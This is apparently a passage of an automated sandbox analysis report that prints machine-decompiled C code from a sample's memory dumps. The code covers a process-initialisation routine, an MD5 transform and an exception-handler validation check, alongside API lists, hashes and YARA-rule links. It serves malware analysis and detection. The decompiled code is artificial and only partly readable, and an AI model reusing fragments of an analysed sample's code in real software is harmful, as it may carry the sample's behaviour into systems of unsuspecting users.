				long _t5;
				void* _t6;
				intOrPtr _t10;
				void* _t14;

				_t10 =  *0x404130;
				_t1 = CreateEventA(0, 1, 0, 0);
				 *0x40413c = _t1;
				if(_t1 == 0) {
					return GetLastError();
				}
				_t3 = GetVersion();
				if(_t3 != 5) {
					L4:
					if(_t14 <= 0) {
						_t4 = 0x32;
						return _t4;
					} else {
						goto L5;
					}
				} else {
					if(_t3 >> 8 > 0) {
						L5:
						 *0x40412c = _t3;
						_t5 = GetCurrentProcessId();
						 *0x404128 = _t5;
						 *0x404130 = _t10;
						_t6 = OpenProcess(0x10047a, 0, _t5);
						 *0x404124 = _t6;
						if(_t6 == 0) {
							 *0x404124 =  *0x404124 | 0xffffffff;
						}
						return 0;
					} else {
						_t14 = _t3 - _t3;
						goto L4;
					}
				}
			}

0x004010d9
0x004010e7
0x004010ed
0x004010f4
0x0040114b
0x0040114b
0x004010f6
0x004010fe
0x0040110b
0x0040110b
0x00401147
0x00401149
0x00000000
0x00000000
0x00000000
0x00401100
0x00401107
0x0040110d
0x0040110d
0x00401112
0x00401120
0x00401125
0x0040112b
0x00401131
0x00401138
0x0040113a
0x0040113a
0x00401144
0x00401109
0x00401109
0x00000000
0x00401109
0x00401107

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00401F23), ref: 004010E7
GetVersion.KERNEL32(?,00401F23), ref: 004010F6
GetCurrentProcessId.KERNEL32(?,00401F23), ref: 00401112
OpenProcess.KERNEL32(0010047A,00000000,00000000,?,00401F23), ref: 0040112B

Memory Dump Source

Source File: 00000002.00000002.503256033.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.503287687.0000000000405000.00000040.00020000.sdmp Download File
Associated: 00000002.00000002.503307562.0000000000407000.00000040.00020000.sdmp Download File

Similarity

API ID: Process$CreateCurrentEventOpenVersion
String ID:
API String ID: 845504543-0
Opcode ID: f6d0d2e42ec7259b4ddd1e6ba98afdd74f2993fcbd69898d33b0d2a22d0471f2
Instruction ID: a4175a2d8b67cfee8d9b48876087550e1fd74fed3b0ae2b4182a7fad601c4361
Opcode Fuzzy Hash: f6d0d2e42ec7259b4ddd1e6ba98afdd74f2993fcbd69898d33b0d2a22d0471f2
Instruction Fuzzy Hash: ADF01DB15413119BDA155F68BF097553BA4A799713F000136E741FE2E4D77445818B4C

Uniqueness

Uniqueness Score: -1.00%

Function 044B15CD, Relevance: 1.9, APIs: 1, Instructions: 611
COMMONCrypto

Download Yara Rule

C-Code - Quality: 49%

			E044B15CD(void* __ecx, intOrPtr* _a4) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				void _v76;
				intOrPtr* _t226;
				signed int _t229;
				signed int _t231;
				signed int _t233;
				signed int _t235;
				signed int _t237;
				signed int _t239;
				signed int _t241;
				signed int _t243;
				signed int _t245;
				signed int _t247;
				signed int _t249;
				signed int _t251;
				signed int _t253;
				signed int _t255;
				signed int _t257;
				signed int _t259;
				signed int _t338;
				signed char* _t348;
				signed int _t349;
				signed int _t351;
				signed int _t353;
				signed int _t355;
				signed int _t357;
				signed int _t359;
				signed int _t361;
				signed int _t363;
				signed int _t365;
				signed int _t367;
				signed int _t376;
				signed int _t378;
				signed int _t380;
				signed int _t382;
				signed int _t384;
				intOrPtr* _t400;
				signed int* _t401;
				signed int _t402;
				signed int _t404;
				signed int _t406;
				signed int _t408;
				signed int _t410;
				signed int _t412;
				signed int _t414;
				signed int _t416;
				signed int _t418;
				signed int _t420;
				signed int _t422;
				signed int _t424;
				signed int _t432;
				signed int _t434;
				signed int _t436;
				signed int _t438;
				signed int _t440;
				signed int _t508;
				signed int _t599;
				signed int _t607;
				signed int _t613;
				signed int _t679;
				void* _t682;
				signed int _t683;
				signed int _t685;
				signed int _t690;
				signed int _t692;
				signed int _t697;
				signed int _t699;
				signed int _t718;
				signed int _t720;
				signed int _t722;
				signed int _t724;
				signed int _t726;
				signed int _t728;
				signed int _t734;
				signed int _t740;
				signed int _t742;
				signed int _t744;
				signed int _t746;
				signed int _t748;

				_t226 = _a4;
				_t348 = __ecx + 2;
				_t401 =  &_v76;
				_t682 = 0x10;
				do {
					 *_t401 = (((_t348[1] & 0x000000ff) << 0x00000008 |  *_t348 & 0x000000ff) << 0x00000008 |  *(_t348 - 1) & 0x000000ff) << 0x00000008 |  *(_t348 - 2) & 0x000000ff;
					_t401 =  &(_t401[1]);
					_t348 =  &(_t348[4]);
					_t682 = _t682 - 1;
				} while (_t682 != 0);
				_t6 = _t226 + 4; // 0x14eb3fc3
				_t683 =  *_t6;
				_t7 = _t226 + 8; // 0x8d08458b
				_t402 =  *_t7;
				_t8 = _t226 + 0xc; // 0x56c1184c
				_t349 =  *_t8;
				asm("rol eax, 0x7");
				_t229 = ( !_t683 & _t349 | _t402 & _t683) + _v76 +  *_t226 - 0x28955b88 + _t683;
				asm("rol ecx, 0xc");
				_t351 = ( !_t229 & _t402 | _t683 & _t229) + _v72 + _t349 - 0x173848aa + _t229;
				asm("ror edx, 0xf");
				_t404 = ( !_t351 & _t683 | _t351 & _t229) + _v68 + _t402 + 0x242070db + _t351;
				asm("ror esi, 0xa");
				_t685 = ( !_t404 & _t229 | _t351 & _t404) + _v64 + _t683 - 0x3e423112 + _t404;
				_v8 = _t685;
				_t690 = _v8;
				asm("rol eax, 0x7");
				_t231 = ( !_t685 & _t351 | _t404 & _v8) + _v60 + _t229 - 0xa83f051 + _t690;
				asm("rol ecx, 0xc");
				_t353 = ( !_t231 & _t404 | _t690 & _t231) + _v56 + _t351 + 0x4787c62a + _t231;
				asm("ror edx, 0xf");
				_t406 = ( !_t353 & _t690 | _t353 & _t231) + _v52 + _t404 - 0x57cfb9ed + _t353;
				asm("ror esi, 0xa");
				_t692 = ( !_t406 & _t231 | _t353 & _t406) + _v48 + _t690 - 0x2b96aff + _t406;
				_v8 = _t692;
				_t697 = _v8;
				asm("rol eax, 0x7");
				_t233 = ( !_t692 & _t353 | _t406 & _v8) + _v44 + _t231 + 0x698098d8 + _t697;
				asm("rol ecx, 0xc");
				_t355 = ( !_t233 & _t406 | _t697 & _t233) + _v40 + _t353 - 0x74bb0851 + _t233;
				asm("ror edx, 0xf");
				_t408 = ( !_t355 & _t697 | _t355 & _t233) + _v36 + _t406 - 0xa44f + _t355;
				asm("ror esi, 0xa");
				_t699 = ( !_t408 & _t233 | _t355 & _t408) + _v32 + _t697 - 0x76a32842 + _t408;
				_v8 = _t699;
				asm("rol eax, 0x7");
				_t235 = ( !_t699 & _t355 | _t408 & _v8) + _v28 + _t233 + 0x6b901122 + _v8;
				asm("rol ecx, 0xc");
				_t357 = ( !_t235 & _t408 | _v8 & _t235) + _v24 + _t355 - 0x2678e6d + _t235;
				_t508 =  !_t357;
				asm("ror edx, 0xf");
				_t410 = (_t508 & _v8 | _t357 & _t235) + _v20 + _t408 - 0x5986bc72 + _t357;
				_v12 = _t410;
				_v12 =  !_v12;
				asm("ror esi, 0xa");
				_t718 = (_v12 & _t235 | _t357 & _t410) + _v16 + _v8 + 0x49b40821 + _t410;
				asm("rol eax, 0x5");
				_t237 = (_t508 & _t410 | _t357 & _t718) + _v72 + _t235 - 0x9e1da9e + _t718;
				asm("rol ecx, 0x9");
				_t359 = (_v12 & _t718 | _t410 & _t237) + _v52 + _t357 - 0x3fbf4cc0 + _t237;
				asm("rol edx, 0xe");
				_t412 = ( !_t718 & _t237 | _t359 & _t718) + _v32 + _t410 + 0x265e5a51 + _t359;
				asm("ror esi, 0xc");
				_t720 = ( !_t237 & _t359 | _t412 & _t237) + _v76 + _t718 - 0x16493856 + _t412;
				asm("rol eax, 0x5");
				_t239 = ( !_t359 & _t412 | _t359 & _t720) + _v56 + _t237 - 0x29d0efa3 + _t720;
				asm("rol ecx, 0x9");
				_t361 = ( !_t412 & _t720 | _t412 & _t239) + _v36 + _t359 + 0x2441453 + _t239;
				asm("rol edx, 0xe");
				_t414 = ( !_t720 & _t239 | _t361 & _t720) + _v16 + _t412 - 0x275e197f + _t361;
				asm("ror esi, 0xc");
				_t722 = ( !_t239 & _t361 | _t414 & _t239) + _v60 + _t720 - 0x182c0438 + _t414;
				asm("rol eax, 0x5");
				_t241 = ( !_t361 & _t414 | _t361 & _t722) + _v40 + _t239 + 0x21e1cde6 + _t722;
				asm("rol ecx, 0x9");
				_t363 = ( !_t414 & _t722 | _t414 & _t241) + _v20 + _t361 - 0x3cc8f82a + _t241;
				asm("rol edx, 0xe");
				_t416 = ( !_t722 & _t241 | _t363 & _t722) + _v64 + _t414 - 0xb2af279 + _t363;
				asm("ror esi, 0xc");
				_t724 = ( !_t241 & _t363 | _t416 & _t241) + _v44 + _t722 + 0x455a14ed + _t416;
				asm("rol eax, 0x5");
				_t243 = ( !_t363 & _t416 | _t363 & _t724) + _v24 + _t241 - 0x561c16fb + _t724;
				asm("rol ecx, 0x9");
				_t365 = ( !_t416 & _t724 | _t416 & _t243) + _v68 + _t363 - 0x3105c08 + _t243;
				asm("rol edx, 0xe");
				_t418 = ( !_t724 & _t243 | _t365 & _t724) + _v48 + _t416 + 0x676f02d9 + _t365;
				asm("ror esi, 0xc");
				_t726 = ( !_t243 & _t365 | _t418 & _t243) + _v28 + _t724 - 0x72d5b376 + _t418;
				asm("rol eax, 0x4");
				_t245 = (_t365 ^ _t418 ^ _t726) + _v56 + _t243 - 0x5c6be + _t726;
				asm("rol ecx, 0xb");
				_t367 = (_t418 ^ _t726 ^ _t245) + _v44 + _t365 - 0x788e097f + _t245;
				asm("rol edx, 0x10");
				_t420 = (_t367 ^ _t726 ^ _t245) + _v32 + _t418 + 0x6d9d6122 + _t367;
				_t599 = _t367 ^ _t420;
				asm("ror esi, 0x9");
				_t728 = (_t599 ^ _t245) + _v20 + _t726 - 0x21ac7f4 + _t420;
				asm("rol eax, 0x4");
				_t247 = (_t599 ^ _t728) + _v72 + _t245 - 0x5b4115bc + _t728;
				asm("rol edi, 0xb");
				_t607 = (_t420 ^ _t728 ^ _t247) + _v60 + _t367 + 0x4bdecfa9 + _t247;
				asm("rol edx, 0x10");
				_t422 = (_t607 ^ _t728 ^ _t247) + _v48 + _t420 - 0x944b4a0 + _t607;
				_t338 = _t607 ^ _t422;
				asm("ror ecx, 0x9");
				_t376 = (_t338 ^ _t247) + _v36 + _t728 - 0x41404390 + _t422;
				asm("rol eax, 0x4");
				_t249 = (_t338 ^ _t376) + _v24 + _t247 + 0x289b7ec6 + _t376;
				asm("rol esi, 0xb");
				_t734 = (_t422 ^ _t376 ^ _t249) + _v76 + _t607 - 0x155ed806 + _t249;
				asm("rol edi, 0x10");
				_t613 = (_t734 ^ _t376 ^ _t249) + _v64 + _t422 - 0x2b10cf7b + _t734;
				_t424 = _t734 ^ _t613;
				asm("ror ecx, 0x9");
				_t378 = (_t424 ^ _t249) + _v52 + _t376 + 0x4881d05 + _t613;
				asm("rol eax, 0x4");
				_t251 = (_t424 ^ _t378) + _v40 + _t249 - 0x262b2fc7 + _t378;
				asm("rol edx, 0xb");
				_t432 = (_t613 ^ _t378 ^ _t251) + _v28 + _t734 - 0x1924661b + _t251;
				asm("rol esi, 0x10");
				_t740 = (_t432 ^ _t378 ^ _t251) + _v16 + _t613 + 0x1fa27cf8 + _t432;
				asm("ror ecx, 0x9");
				_t380 = (_t432 ^ _t740 ^ _t251) + _v68 + _t378 - 0x3b53a99b + _t740;
				asm("rol eax, 0x6");
				_t253 = (( !_t432 | _t380) ^ _t740) + _v76 + _t251 - 0xbd6ddbc + _t380;
				asm("rol edx, 0xa");
				_t434 = (( !_t740 | _t253) ^ _t380) + _v48 + _t432 + 0x432aff97 + _t253;
				asm("rol esi, 0xf");
				_t742 = (( !_t380 | _t434) ^ _t253) + _v20 + _t740 - 0x546bdc59 + _t434;
				asm("ror ecx, 0xb");
				_t382 = (( !_t253 | _t742) ^ _t434) + _v56 + _t380 - 0x36c5fc7 + _t742;
				asm("rol eax, 0x6");
				_t255 = (( !_t434 | _t382) ^ _t742) + _v28 + _t253 + 0x655b59c3 + _t382;
				asm("rol edx, 0xa");
				_t436 = (( !_t742 | _t255) ^ _t382) + _v64 + _t434 - 0x70f3336e + _t255;
				asm("rol esi, 0xf");
				_t744 = (( !_t382 | _t436) ^ _t255) + _v36 + _t742 - 0x100b83 + _t436;
				asm("ror ecx, 0xb");
				_t384 = (( !_t255 | _t744) ^ _t436) + _v72 + _t382 - 0x7a7ba22f + _t744;
				asm("rol eax, 0x6");
				_t257 = (( !_t436 | _t384) ^ _t744) + _v44 + _t255 + 0x6fa87e4f + _t384;
				asm("rol edx, 0xa");
				_t438 = (( !_t744 | _t257) ^ _t384) + _v16 + _t436 - 0x1d31920 + _t257;
				asm("rol esi, 0xf");
				_t746 = (( !_t384 | _t438) ^ _t257) + _v52 + _t744 - 0x5cfebcec + _t438;
				asm("ror edi, 0xb");
				_t679 = (( !_t257 | _t746) ^ _t438) + _v24 + _t384 + 0x4e0811a1 + _t746;
				asm("rol eax, 0x6");
				_t259 = (( !_t438 | _t679) ^ _t746) + _v60 + _t257 - 0x8ac817e + _t679;
				asm("rol edx, 0xa");
				_t440 = (( !_t746 | _t259) ^ _t679) + _v32 + _t438 - 0x42c50dcb + _t259;
				_t400 = _a4;
				asm("rol esi, 0xf");
				_t748 = (( !_t679 | _t440) ^ _t259) + _v68 + _t746 + 0x2ad7d2bb + _t440;
				 *_t400 =  *_t400 + _t259;
				asm("ror eax, 0xb");
				 *((intOrPtr*)(_t400 + 4)) = (( !_t259 | _t748) ^ _t440) + _v40 + _t679 - 0x14792c6f +  *((intOrPtr*)(_t400 + 4)) + _t748;
				 *((intOrPtr*)(_t400 + 8)) =  *((intOrPtr*)(_t400 + 8)) + _t748;
				 *((intOrPtr*)(_t400 + 0xc)) =  *((intOrPtr*)(_t400 + 0xc)) + _t440;
				return memset( &_v76, 0, 0x40);
			}

0x044b15d0
0x044b15db
0x044b15de
0x044b15e1
0x044b15e2
0x044b1600
0x044b1602
0x044b1605
0x044b1608
0x044b1608
0x044b160b
0x044b160b
0x044b160e
0x044b160e
0x044b1611
0x044b1611
0x044b162e
0x044b1631
0x044b1647
0x044b164a
0x044b1664
0x044b1667
0x044b167d
0x044b1680
0x044b1682
0x044b169a
0x044b169d
0x044b16a0
0x044b16b8
0x044b16bb
0x044b16d5
0x044b16d8
0x044b16ee
0x044b16f1
0x044b16f3
0x044b170b
0x044b1710
0x044b1713
0x044b1729
0x044b172c
0x044b1746
0x044b1749
0x044b175f
0x044b1762
0x044b1764
0x044b177f
0x044b1782
0x044b1799
0x044b179c
0x044b17a0
0x044b17b9
0x044b17bc
0x044b17be
0x044b17c1
0x044b17dc
0x044b17df
0x044b17f8
0x044b17fb
0x044b180b
0x044b180e
0x044b1826
0x044b1829
0x044b1843
0x044b1846
0x044b185e
0x044b1861
0x044b1877
0x044b187a
0x044b1892
0x044b1895
0x044b18ad
0x044b18b0
0x044b18ca
0x044b18cd
0x044b18e3
0x044b18e6
0x044b18fe
0x044b1901
0x044b191b
0x044b191e
0x044b1936
0x044b1939
0x044b194f
0x044b1952
0x044b196a
0x044b196d
0x044b1985
0x044b1988
0x044b199a
0x044b199d
0x044b19af
0x044b19b2
0x044b19c4
0x044b19c7
0x044b19cb
0x044b19db
0x044b19de
0x044b19ec
0x044b19ef
0x044b1a01
0x044b1a04
0x044b1a18
0x044b1a1b
0x044b1a1d
0x044b1a2d
0x044b1a30
0x044b1a42
0x044b1a45
0x044b1a53
0x044b1a56
0x044b1a68
0x044b1a6b
0x044b1a6f
0x044b1a7f
0x044b1a82
0x044b1a94
0x044b1a97
0x044b1aa5
0x044b1aa8
0x044b1aba
0x044b1abd
0x044b1acf
0x044b1ad2
0x044b1ae6
0x044b1ae9
0x044b1afd
0x044b1b00
0x044b1b14
0x044b1b17
0x044b1b2b
0x044b1b2e
0x044b1b42
0x044b1b45
0x044b1b59
0x044b1b5e
0x044b1b70
0x044b1b73
0x044b1b87
0x044b1b8a
0x044b1b9e
0x044b1ba1
0x044b1bb7
0x044b1bba
0x044b1bce
0x044b1bd1
0x044b1be3
0x044b1be6
0x044b1bfa
0x044b1bfd
0x044b1c11
0x044b1c14
0x044b1c28
0x044b1c31
0x044b1c34
0x044b1c3d
0x044b1c46
0x044b1c4e
0x044b1c56
0x044b1c60
0x044b1c75

APIs

memset.NTDLL ref: 044B1C69

Memory Dump Source

Source File: 00000002.00000002.504929898.00000000044B1000.00000020.00000001.sdmp, Offset: 044B0000, based on PE: true

Associated: 00000002.00000002.504923549.00000000044B0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.504944310.00000000044BC000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.504952185.00000000044BD000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.504963581.00000000044BF000.00000002.00000001.sdmp Download File

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: 15e1380e15b0ebf54054c847e8a18368959b7e1851db026a7a40a2c4e248b9ad
Instruction ID: ba47bd41f710fb298646090aedc577dc7085c5f78df3af47d9dce21e54dc0071
Opcode Fuzzy Hash: 15e1380e15b0ebf54054c847e8a18368959b7e1851db026a7a40a2c4e248b9ad
Instruction Fuzzy Hash: 0122847BE516169BDB08CA95CC805E9B3E3BBC832471F9179C919E3305EE797A0786C0

Uniqueness

Uniqueness Score: -1.00%

Function 044BB10D, Relevance: 1.7, APIs: 1, Instructions: 195
nativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E044BB10D(long _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				short* _v32;
				void _v36;
				void* _t57;
				signed int _t58;
				signed int _t61;
				signed int _t62;
				void* _t63;
				signed int* _t68;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr _t72;
				intOrPtr _t75;
				void* _t76;
				signed int _t77;
				void* _t78;
				void _t80;
				signed int _t81;
				signed int _t84;
				signed int _t86;
				short* _t87;
				void* _t89;
				signed int* _t90;
				long _t91;
				signed int _t93;
				signed int _t94;
				signed int _t100;
				signed int _t102;
				void* _t104;
				long _t108;
				signed int _t110;

				_t108 = _a4;
				_t76 =  *(_t108 + 8);
				if((_t76 & 0x00000003) != 0) {
					L3:
					return 0;
				}
				_a4 =  *[fs:0x4];
				_v8 =  *[fs:0x8];
				if(_t76 < _v8 || _t76 >= _a4) {
					_t102 =  *(_t108 + 0xc);
					__eflags = _t102 - 0xffffffff;
					if(_t102 != 0xffffffff) {
						_t91 = 0;
						__eflags = 0;
						_a4 = 0;
						_t57 = _t76;
						do {
							_t80 =  *_t57;
							__eflags = _t80 - 0xffffffff;
							if(_t80 == 0xffffffff) {
								goto L9;
							}
							__eflags = _t80 - _t91;
							if(_t80 >= _t91) {
								L20:
								_t63 = 0;
								L60:
								return _t63;
							}
							L9:
							__eflags =  *(_t57 + 4);
							if( *(_t57 + 4) != 0) {
								_t12 =  &_a4;
								 *_t12 = _a4 + 1;
								__eflags =  *_t12;
							}
							_t91 = _t91 + 1;
							_t57 = _t57 + 0xc;
							__eflags = _t91 - _t102;
						} while (_t91 <= _t102);
						__eflags = _a4;
						if(_a4 == 0) {
							L15:
							_t81 =  *0x44bd2d8; // 0x0
							_t110 = _t76 & 0xfffff000;
							_t58 = 0;
							__eflags = _t81;
							if(_t81 <= 0) {
								L18:
								_t104 = _t102 | 0xffffffff;
								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
								__eflags = _t61;
								if(_t61 < 0) {
									_t62 = 0;
									__eflags = 0;
								} else {
									_t62 = _a4;
								}
								__eflags = _t62;
								if(_t62 == 0) {
									L59:
									_t63 = _t104;
									goto L60;
								} else {
									__eflags = _v12 - 0x1000000;
									if(_v12 != 0x1000000) {
										goto L59;
									}
									__eflags = _v16 & 0x000000cc;
									if((_v16 & 0x000000cc) == 0) {
										L46:
										_t63 = 1;
										 *0x44bd320 = 1;
										__eflags =  *0x44bd320;
										if( *0x44bd320 != 0) {
											goto L60;
										}
										_t84 =  *0x44bd2d8; // 0x0
										__eflags = _t84;
										_t93 = _t84;
										if(_t84 <= 0) {
											L51:
											__eflags = _t93;
											if(_t93 != 0) {
												L58:
												 *0x44bd320 = 0;
												goto L5;
											}
											_t77 = 0xf;
											__eflags = _t84 - _t77;
											if(_t84 <= _t77) {
												_t77 = _t84;
											}
											_t94 = 0;
											__eflags = _t77;
											if(_t77 < 0) {
												L56:
												__eflags = _t84 - 0x10;
												if(_t84 < 0x10) {
													_t86 = _t84 + 1;
													__eflags = _t86;
													 *0x44bd2d8 = _t86;
												}
												goto L58;
											} else {
												do {
													_t68 = 0x44bd2e0 + _t94 * 4;
													_t94 = _t94 + 1;
													__eflags = _t94 - _t77;
													 *_t68 = _t110;
													_t110 =  *_t68;
												} while (_t94 <= _t77);
												goto L56;
											}
										}
										_t69 = 0x44bd2dc + _t84 * 4;
										while(1) {
											__eflags =  *_t69 - _t110;
											if( *_t69 == _t110) {
												goto L51;
											}
											_t93 = _t93 - 1;
											_t69 = _t69 - 4;
											__eflags = _t93;
											if(_t93 > 0) {
												continue;
											}
											goto L51;
										}
										goto L51;
									}
									_t87 = _v32;
									__eflags =  *_t87 - 0x5a4d;
									if( *_t87 != 0x5a4d) {
										goto L59;
									}
									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
									__eflags =  *_t71 - 0x4550;
									if( *_t71 != 0x4550) {
										goto L59;
									}
									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
									if( *((short*)(_t71 + 0x18)) != 0x10b) {
										goto L59;
									}
									_t78 = _t76 - _t87;
									__eflags =  *((short*)(_t71 + 6));
									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
									if( *((short*)(_t71 + 6)) <= 0) {
										goto L59;
									}
									_t72 =  *((intOrPtr*)(_t89 + 0xc));
									__eflags = _t78 - _t72;
									if(_t78 < _t72) {
										goto L46;
									}
									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
										goto L46;
									}
									__eflags =  *(_t89 + 0x27) & 0x00000080;
									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
										goto L20;
									}
									goto L46;
								}
							} else {
								goto L16;
							}
							while(1) {
								L16:
								__eflags =  *((intOrPtr*)(0x44bd2e0 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x44bd2e0 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 + 1;
								__eflags = _t58 - _t81;
								if(_t58 < _t81) {
									continue;
								}
								goto L18;
							}
							__eflags = _t58;
							if(_t58 <= 0) {
								goto L5;
							}
							 *0x44bd320 = 1;
							__eflags =  *0x44bd320;
							if( *0x44bd320 != 0) {
								goto L5;
							}
							__eflags =  *((intOrPtr*)(0x44bd2e0 + _t58 * 4)) - _t110;
							if( *((intOrPtr*)(0x44bd2e0 + _t58 * 4)) == _t110) {
								L32:
								_t100 = 0;
								__eflags = _t58;
								if(_t58 < 0) {
									L34:
									 *0x44bd320 = 0;
									goto L5;
								} else {
									goto L33;
								}
								do {
									L33:
									_t90 = 0x44bd2e0 + _t100 * 4;
									_t100 = _t100 + 1;
									__eflags = _t100 - _t58;
									 *_t90 = _t110;
									_t110 =  *_t90;
								} while (_t100 <= _t58);
								goto L34;
							}
							_t25 = _t81 - 1; // -1
							_t58 = _t25;
							__eflags = _t58;
							if(_t58 < 0) {
								L28:
								__eflags = _t81 - 0x10;
								if(_t81 < 0x10) {
									_t81 = _t81 + 1;
									__eflags = _t81;
									 *0x44bd2d8 = _t81;
								}
								_t28 = _t81 - 1; // 0x0
								_t58 = _t28;
								goto L32;
							} else {
								goto L25;
							}
							while(1) {
								L25:
								__eflags =  *((intOrPtr*)(0x44bd2e0 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x44bd2e0 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 - 1;
								__eflags = _t58;
								if(_t58 >= 0) {
									continue;
								}
								break;
							}
							__eflags = _t58;
							if(__eflags >= 0) {
								if(__eflags == 0) {
									goto L34;
								}
								goto L32;
							}
							goto L28;
						}
						_t75 =  *((intOrPtr*)(_t108 - 8));
						__eflags = _t75 - _v8;
						if(_t75 < _v8) {
							goto L20;
						}
						__eflags = _t75 - _t108;
						if(_t75 >= _t108) {
							goto L20;
						}
						goto L15;
					}
					L5:
					_t63 = 1;
					goto L60;
				} else {
					goto L3;
				}
			}

0x044bb117
0x044bb11a
0x044bb120
0x044bb13e
0x00000000
0x044bb13e
0x044bb128
0x044bb131
0x044bb137
0x044bb146
0x044bb149
0x044bb14c
0x044bb156
0x044bb156
0x044bb158
0x044bb15b
0x044bb15d
0x044bb15d
0x044bb15f
0x044bb162
0x00000000
0x00000000
0x044bb164
0x044bb166
0x044bb1cc
0x044bb1cc
0x044bb32a
0x00000000
0x044bb32a
0x044bb168
0x044bb168
0x044bb16c
0x044bb16e
0x044bb16e
0x044bb16e
0x044bb16e
0x044bb171
0x044bb172
0x044bb175
0x044bb175
0x044bb179
0x044bb17d
0x044bb18b
0x044bb18b
0x044bb193
0x044bb199
0x044bb19b
0x044bb19d
0x044bb1ad
0x044bb1ba
0x044bb1be
0x044bb1c3
0x044bb1c5
0x044bb243
0x044bb243
0x044bb1c7
0x044bb1c7
0x044bb1c7
0x044bb245
0x044bb247
0x044bb328
0x044bb328
0x00000000
0x044bb24d
0x044bb24d
0x044bb254
0x00000000
0x00000000
0x044bb25a
0x044bb25e
0x044bb2ba
0x044bb2bc
0x044bb2c4
0x044bb2c6
0x044bb2c8
0x00000000
0x00000000
0x044bb2ca
0x044bb2d0
0x044bb2d2
0x044bb2d4
0x044bb2e9
0x044bb2e9
0x044bb2eb
0x044bb31a
0x044bb321
0x00000000
0x044bb321
0x044bb2ef
0x044bb2f0
0x044bb2f2
0x044bb2f4
0x044bb2f4
0x044bb2f6
0x044bb2f8
0x044bb2fa
0x044bb30e
0x044bb30e
0x044bb311
0x044bb313
0x044bb313
0x044bb314
0x044bb314
0x00000000
0x044bb2fc
0x044bb2fc
0x044bb2fc
0x044bb305
0x044bb306
0x044bb308
0x044bb30a
0x044bb30a
0x00000000
0x044bb2fc
0x044bb2fa
0x044bb2d6
0x044bb2dd
0x044bb2dd
0x044bb2df
0x00000000
0x00000000
0x044bb2e1
0x044bb2e2
0x044bb2e5
0x044bb2e7
0x00000000
0x00000000
0x00000000
0x044bb2e7
0x00000000
0x044bb2dd
0x044bb260
0x044bb263
0x044bb268
0x00000000
0x00000000
0x044bb271
0x044bb273
0x044bb279
0x00000000
0x00000000
0x044bb27f
0x044bb285
0x00000000
0x00000000
0x044bb28b
0x044bb28d
0x044bb296
0x044bb29a
0x00000000
0x00000000
0x044bb2a0
0x044bb2a3
0x044bb2a5
0x00000000
0x00000000
0x044bb2ac
0x044bb2ae
0x00000000
0x00000000
0x044bb2b0
0x044bb2b4
0x00000000
0x00000000
0x00000000
0x044bb2b4
0x00000000
0x00000000
0x00000000
0x044bb19f
0x044bb19f
0x044bb19f
0x044bb1a6
0x00000000
0x00000000
0x044bb1a8
0x044bb1a9
0x044bb1ab
0x00000000
0x00000000
0x00000000
0x044bb1ab
0x044bb1d3
0x044bb1d5
0x00000000
0x00000000
0x044bb1e5
0x044bb1e7
0x044bb1e9
0x00000000
0x00000000
0x044bb1ef
0x044bb1f6
0x044bb222
0x044bb222
0x044bb224
0x044bb226
0x044bb23a
0x044bb23c
0x00000000
0x00000000
0x00000000
0x00000000
0x044bb228
0x044bb228
0x044bb228
0x044bb231
0x044bb232
0x044bb234
0x044bb236
0x044bb236
0x00000000
0x044bb228
0x044bb1f8
0x044bb1f8
0x044bb1fb
0x044bb1fd
0x044bb20f
0x044bb20f
0x044bb212
0x044bb214
0x044bb214
0x044bb215
0x044bb215
0x044bb21b
0x044bb21b
0x00000000
0x00000000
0x00000000
0x00000000
0x044bb1ff
0x044bb1ff
0x044bb1ff
0x044bb206
0x00000000
0x00000000
0x044bb208
0x044bb208
0x044bb209
0x00000000
0x00000000
0x00000000
0x044bb209
0x044bb20b
0x044bb20d
0x044bb220
0x00000000
0x00000000
0x00000000
0x044bb220
0x00000000
0x044bb20d
0x044bb17f
0x044bb182
0x044bb185
0x00000000
0x00000000
0x044bb187
0x044bb189
0x00000000
0x00000000
0x00000000
0x044bb189
0x044bb14e
0x044bb150
0x00000000
0x00000000
0x00000000
0x00000000

APIs

NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 044BB1BE

Memory Dump Source

Source File: 00000002.00000002.504929898.00000000044B1000.00000020.00000001.sdmp, Offset: 044B0000, based on PE: true

Associated: 00000002.00000002.504923549.00000000044B0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.504944310.00000000044BC000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.504952185.00000000044BD000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.504963581.00000000044BF000.00000002.00000001.sdmp Download File

Similarity

API ID: MemoryQueryVirtual
String ID:
API String ID: 2850889275-0
Opcode ID: edae3db16e28e7c3194e81b126b8b7bebc3dc2c08e39b7f6440b2d4d103355f6
Instruction ID: 168ba70a24fc7f41fea24febadc7954e1b4b9d00e09dc1494b170f37c2946fa2
